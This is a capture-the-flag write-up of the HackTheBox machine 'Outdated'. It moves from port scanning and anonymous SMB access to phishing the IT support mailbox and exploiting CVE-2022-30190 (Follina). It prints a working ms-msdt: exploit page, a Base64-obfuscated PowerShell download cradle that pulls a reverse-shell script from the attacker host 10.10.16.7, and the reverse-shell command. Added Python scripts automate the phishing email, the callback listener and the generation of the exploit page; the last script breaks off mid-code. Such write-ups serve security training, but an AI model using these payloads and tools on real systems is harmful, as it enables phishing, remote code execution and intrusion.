Outdated Write-Up

Initial Recon
Nmap
Starting with a full TCP port scan (all 65535 ports, with version detection and default scripts), I got the results below:
$ nmap -vvv -p- -A -oN nmap/tcp-all.txt -Pn 10.10.11.175
Nmap scan report for 10.10.11.175
Host is up, received user-set (0.077s latency).
Scanned at 2022-09-26 14:09:09 EEST for 731s
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack hMailServer smtpd
| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2022-09-26 18:19:42Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Issuer: commonName=outdated-DC-CA/domainComponent=outdated
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-18T05:50:24
| Not valid after: 2024-06-18T06:00:24
| MD5: ddf3 d13d 3a6a 3fa0 1dee 8321 6784 83dc
| SHA-1: 7544 3aee ffbc 2ea7 bf61 1380 0a6c 16f1 cd07 afce
| -----BEGIN CERTIFICATE-----
| MIIFpDCCBIygAwIBAgITHQAAAAO0Hc53pH72GAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRgwFgYKCZImiZPyLGQBGRYIb3V0ZGF0
| ZWQxFzAVBgNVBAMTDm91dGRhdGVkLURDLUNBMB4XDTIyMDYxODA1NTAyNFoXDTI0
| MDYxODA2MDAyNFowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALE6
| oXztlMZYhET3e+DVQAJYB52HQHQnklGuIC5cIeoxbR4WiwfWXRhIpfNEo/1IXSs2
| xk4jOJpYOklg4PwfdHxhrS06+wSto7MgSksULWwjm0b7llqixKxo3o+PgVYOgQtN
| 7T6Mpxo153Q1gAVI0u6WpSYcSTBSMh//0anXX+2jPT5KNkoq7Ck3e4Nhjb44XFIT
| KG1xC+EbiwbcMxhW6+ufGIu3bINYQudykPSS8zClFmFWH9KnBvrpNDYdFye+6iz6
| AFMcjmzy1Ezwec/3pP1EutaZHf1pTCJ+ec7O3mISNQ19hPaI3pMcgGzpUEPvpWfj
| HzPymRPVfGof6KGSjq0CAwEAAaOCAs0wggLJMDsGCSsGAQQBgjcVBwQuMCwGJCsG
| AQQBgjcVCIT9zQLE9DP5hROD9rYjhd3sS0OD/9Y6hYyCKwIBZAIBAjAyBgNVHSUE
| KzApBgcrBgEFAgMFBgorBgEEAYI3FAICBggrBgEFBQcDAQYIKwYBBQUHAwIwDgYD
| VR0PAQH/BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCQYHKwYBBQIDBTAMBgorBgEE
| AYI3FAICMAoGCCsGAQUFBwMBMAoGCCsGAQUFBwMCMB0GA1UdDgQWBBSsuFEFtUSl
| l20qj0JnZQ99CDj4UDAfBgNVHSMEGDAWgBQqRfR/8VopV8PGTe6GJT0dbv5UtjCB
| yAYDVR0fBIHAMIG9MIG6oIG3oIG0hoGxbGRhcDovLy9DTj1vdXRkYXRlZC1EQy1D
| QSxDTj1EQyxDTj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2Vy
| dmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1vdXRkYXRlZCxEQz1odGI/Y2VydGlm
| aWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1
| dGlvblBvaW50MIHBBggrBgEFBQcBAQSBtDCBsTCBrgYIKwYBBQUHMAKGgaFsZGFw
| Oi8vL0NOPW91dGRhdGVkLURDLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBT
| ZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW91dGRhdGVk
| LERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNh
| dGlvbkF1dGhvcml0eTA1BgNVHREBAf8EKzApgg9EQy5vdXRkYXRlZC5odGKCDG91
| dGRhdGVkLmh0YoIIT1VUREFURUQwDQYJKoZIhvcNAQELBQADggEBAA4fLq61cFEC
| gv9/iMwPO02NC0SbPNHquvsIdEwkqEvx+hr6hfvmv3UTyQXgZQSIZDoaZWxR/47l
| JDQjF45v9O0rYKvYKLh/tOpCaxY2cF1RcRJiO2Vbg/RtKB/dd022srF+u2nBuvO0
| VgxHlsiP+tHvY8zX9JBVMMQLjx8Uf9yPkxO7rNwNHyeh5PKtcUrqNRQc8n0Pqg6K
| Mc320ONyncAW7RPAdVd3zhLsHEzBtGtZgmc8QXKNsxdxbdmDbiCRQFsCKLku3m7M
| vtnc2e0fgjcVmBmJqQVOdptMb7L80UtN8mYkjMkvdeCO2QrAoAir1J8osZo7TWpL
| E2BaNXsDGeo=
|_-----END CERTIFICATE-----
|_ssl-date: 2022-09-26T18:21:14+00:00; +6h59m57s from scanner time.
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Issuer: commonName=outdated-DC-CA/domainComponent=outdated
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-18T05:50:24
| Not valid after: 2024-06-18T06:00:24
| MD5: ddf3 d13d 3a6a 3fa0 1dee 8321 6784 83dc
| SHA-1: 7544 3aee ffbc 2ea7 bf61 1380 0a6c 16f1 cd07 afce
|_ (certificate body identical to the one shown for port 389; omitted)
|_ssl-date: 2022-09-26T18:21:15+00:00; +6h59m57s from scanner time.
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Issuer: commonName=outdated-DC-CA/domainComponent=outdated
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-18T05:50:24
| Not valid after: 2024-06-18T06:00:24
| MD5: ddf3 d13d 3a6a 3fa0 1dee 8321 6784 83dc
| SHA-1: 7544 3aee ffbc 2ea7 bf61 1380 0a6c 16f1 cd07 afce
|_ (certificate body identical to the one shown for port 389; omitted)
|_ssl-date: 2022-09-26T18:21:14+00:00; +6h59m57s from scanner time.
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-09-26T18:21:15+00:00; +6h59m57s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Issuer: commonName=outdated-DC-CA/domainComponent=outdated
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-18T05:50:24
| Not valid after: 2024-06-18T06:00:24
| MD5: ddf3 d13d 3a6a 3fa0 1dee 8321 6784 83dc
| SHA-1: 7544 3aee ffbc 2ea7 bf61 1380 0a6c 16f1 cd07 afce
|_ (certificate body identical to the one shown for port 389; omitted)
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8530/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title.
8531/tcp open unknown syn-ack
9389/tcp open mc-nmf syn-ack .NET Message Framing
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49687/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49688/tcp open msrpc syn-ack Microsoft Windows RPC
49930/tcp open msrpc syn-ack Microsoft Windows RPC
60156/tcp open msrpc syn-ack Microsoft Windows RPC
63257/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Hosts: mail.outdated.htb, DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-09-26T18:20:36
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 38272/tcp): CLEAN (Timeout)
| Check 2 (port 42327/tcp): CLEAN (Timeout)
| Check 3 (port 4812/udp): CLEAN (Timeout)
| Check 4 (port 48887/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 6h59m56s, deviation: 0s, median: 6h59m56s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 26 14:21:20 2022 -- 1 IP address (1 host up) scanned in 731.38 seconds
The usual domain controller ports are open: 53 (DNS), 88 (Kerberos), 135 (MSRPC), 139/445 (SMB), 389/636 and 3268/3269 (LDAP, LDAPS and the global catalog), 5985 (WinRM) and 9389 (ADWS). LDAP and the certificate's Subject Alternative Names disclose the domain outdated.htb and the DC name DC.outdated.htb. Port 25 runs hMailServer and its banner discloses mail.outdated.htb. Two less common ports, 8530 and 8531, are the default HTTP and HTTPS listeners of WSUS, so the DC is also the update server; that matters later. Note as well the clock skew of almost seven hours between my machine and the DC: anything Kerberos-related run from Kali will need the clock adjusted.
I'll add these names to my /etc/hosts file (entries are whitespace-separated, so no commas between the hostnames):
echo -e '10.10.11.175\toutdated.htb dc.outdated.htb mail.outdated.htb' | sudo tee -a /etc/hosts
$ grep outdated /etc/hosts
10.10.11.175 outdated.htb dc.outdated.htb mail.outdated.htb
Accessing Shares
First I'll list the available shares over a null session:
smbclient -L 10.10.11.175 --no-pass
I can see some interesting shares, so I'll take a look at the Shares share, again without credentials:
smbclient //10.10.11.175/Shares --no-pass
Reading Important PDF
After accessing Shares share, I saw a NOC_Reminder.pdf file, and this is what it contains:
Sending Link To Victim
It appears they had a breach and ran a security assessment of their network, which identified the CVEs listed in the document. The PDF also gives a mailbox, itsupport@outdated.htb, for the support staff: they are to receive emails containing links to internal applications so that those can be added to the assessment process.
Since port 25 (SMTP) is open and the server accepted my mail for the domain without authentication, I'll send a link to itsupport@outdated.htb while listening with netcat on port 80 on my machine, and see whether anyone follows it:
sendemail -f most@xeon.com -t itsupport@outdated.htb -u "Click on link" -m "http://10.10.16.7/" -s 10.10.11.175:25 -vvv
Identifying What Exploit Could Work
It worked. The request came from Windows PowerShell, whose User-Agent discloses WindowsPowerShell/5.1.19041.906; the last part, 19041.906, is the build number of the Windows installation that PowerShell is running on.
Googling this version shows that it was released on March 29 2021:
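As an added example (my code, not the write-up's or any tool's), here is the same lure-and-callback step in Python: it sends the single-link mail through the target's own SMTP service, exactly as the sendemail one-liner does, and runs a listener that records each hit and pulls the PowerShell version and Windows build out of the User-Agent. The sender address, recipient, target IP and listener address are the ones the write-up uses; the User-Agent format is the one PowerShell 5.1's web cmdlets send.

```python
#!/usr/bin/env python3
"""Added example (not code from the write-up): deliver the lure through the
target's own SMTP service and catch the callback, recording which client
followed the link.  Assumed from the write-up: 10.10.11.175:25 accepts mail
for itsupport@outdated.htb without authentication and our listener is
reachable from the target on 10.10.16.7:80."""
import re
import smtplib
import sys
from email.message import EmailMessage
from http.server import BaseHTTPRequestHandler, HTTPServer

# User-Agent sent by PowerShell's web cmdlets, e.g.
# "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.906"
PS_UA_RE = re.compile(r"WindowsPowerShell/(?P<ps>\d+\.\d+)\.(?P<build>\d+\.\d+)")


def parse_powershell_user_agent(ua):
    """Return (powershell_version, windows_build) or None for a non-PowerShell client."""
    m = PS_UA_RE.search(ua or "")
    return (m.group("ps"), m.group("build")) if m else None


def make_lure(sender, recipient, url, subject="Click on link"):
    """A plain-text mail whose body is just the link, like the sendemail one-liner."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(url + "\n")
    return msg


def send_lure(msg, smtp_host, smtp_port=25):
    """No AUTH and no STARTTLS: the server offered AUTH LOGIN but did not require it."""
    with smtplib.SMTP(smtp_host, smtp_port, timeout=15) as smtp:
        smtp.send_message(msg)


def describe_hit(client_ip, path, ua):
    """One log line per callback; flags PowerShell clients and their OS build."""
    parsed = parse_powershell_user_agent(ua)
    if parsed:
        return f"{client_ip} GET {path} from PowerShell {parsed[0]} on Windows build {parsed[1]}"
    return f"{client_ip} GET {path} from {ua or '<no User-Agent>'}"


class CallbackHandler(BaseHTTPRequestHandler):
    """Answer any GET with an empty page and keep a record of every hit."""
    hits = []  # (client_ip, path, user_agent, parsed)

    def do_GET(self):
        ua = self.headers.get("User-Agent", "")
        CallbackHandler.hits.append(
            (self.client_address[0], self.path, ua, parse_powershell_user_agent(ua)))
        print(describe_hit(self.client_address[0], self.path, ua), file=sys.stderr)
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(b"<!doctype html><html><body></body></html>")

    def log_message(self, fmt, *args):
        pass  # the line printed in do_GET replaces the default access log


if __name__ == "__main__":
    # usage: ./lure.py [our_ip] [port]  -- send the mail, then wait for the hit
    our_ip = sys.argv[1] if len(sys.argv) > 1 else "10.10.16.7"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    send_lure(make_lure("most@xeon.com", "itsupport@outdated.htb",
                        f"http://{our_ip}:{port}/"), "10.10.11.175")
    HTTPServer(("", port), CallbackHandler).serve_forever()
```

Binding port 80 needs root; the listener only ever returns an empty page, so nothing is exposed if someone other than the intended script follows the link.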
After reading up on the CVEs listed in the PDF, how each works and when it was patched (to judge whether this build is still vulnerable), some of them turned out to be exploitable simply by getting the victim to open a link. The one that stood out is CVE-2022-30190 (Follina): an application only has to open an attacker-controlled HTML document, which redirects to an ms-msdt: URL, and the Microsoft Support Diagnostic Tool (msdt.exe) executes the attacker's PowerShell, giving remote code execution. Follina was disclosed at the end of May 2022 and fixed in the June 2022 updates, long after this March 2021 build.
Exploiting CVE-2022-30190
There are many PoCs available online; the one I'll use is this CVE-2022-30190 PoC:
git clone https://github.com/onecloudemoji/CVE-2022-30190.git
The repo includes a .docx that would normally be sent to the victim, who has to open it to trigger the exploit: the document references the remote HTML through an external OLE object, and it is that HTML, not the .docx, which carries the ms-msdt: redirect. In my case I don't need the .docx at all, since the victim is already fetching and opening my page with PowerShell, so all I need to do is modify the payload in exploit.html to run my command and return a reverse shell.
exploit.html looks like this:
<!doctype html>
<html lang="en">
<head>
<title>
Exploit
</title>
</head>
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/SYstem32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>
</body>
</html>
The only thing I need to modify is the last line inside the script tag: replace Start-Process('calc') with my reverse-shell code. Everything else has to stay the same or the exploit will not fire.
The payload cannot contain spaces, though, because they break the msdt parameter string, and the PoC's launcher also spells colons and double quotes as [char]58 and [char]34 rather than writing them literally. One way to satisfy that is to Base64-encode the real command and have Invoke-Expression decode and run it, which gives a payload like this:
Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwOi8vMTAuMTAuMTYuNy9JbnZva2UtUG93ZXJTaGVsbFRjcC5wczEiKQ=='+[char]34+'))')))
Where the decoded Base64 payload is:
Encoded: SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwOi8vMTAuMTAuMTYuNy9JbnZva2UtUG93ZXJTaGVsbFRjcC5wczEiKQ==
Decoded: IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.7/Invoke-PowerShellTcp.ps1")
It uses IEX to download a PowerShell script from my server and run it in memory, without writing it to disk.
That script is Invoke-PowerShellTcp.ps1 from the Nishang project, with this line appended at the end so the reverse connection is made as soon as the script loads:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.7 -Port 1234
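As an added example (mine, not code from the write-up or the PoC repository), the following Python script builds that launcher from an arbitrary PowerShell command, refuses it if it contains a character the msdt parameter string cannot carry, and writes exploit.html with the same ms-msdt: invocation and the PoC's comment padding. The server address and script name are the ones used above; the output file name exploit.html is my choice.

```python
#!/usr/bin/env python3
"""Added example, not code from the write-up or the PoC repository: build the
space-free launcher and the exploit.html that redirects into ms-msdt:.  The
server address 10.10.16.7 and the Nishang script name come from the write-up."""
import base64
import re

# The PoC's diagnostic-package invocation with a placeholder where
# Start-Process('calc') sat.  The \" are JavaScript string escapes, because
# the URL ends up inside a double-quoted JavaScript literal.
MSDT_TEMPLATE = (
    'ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=cal?c '
    'IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed '
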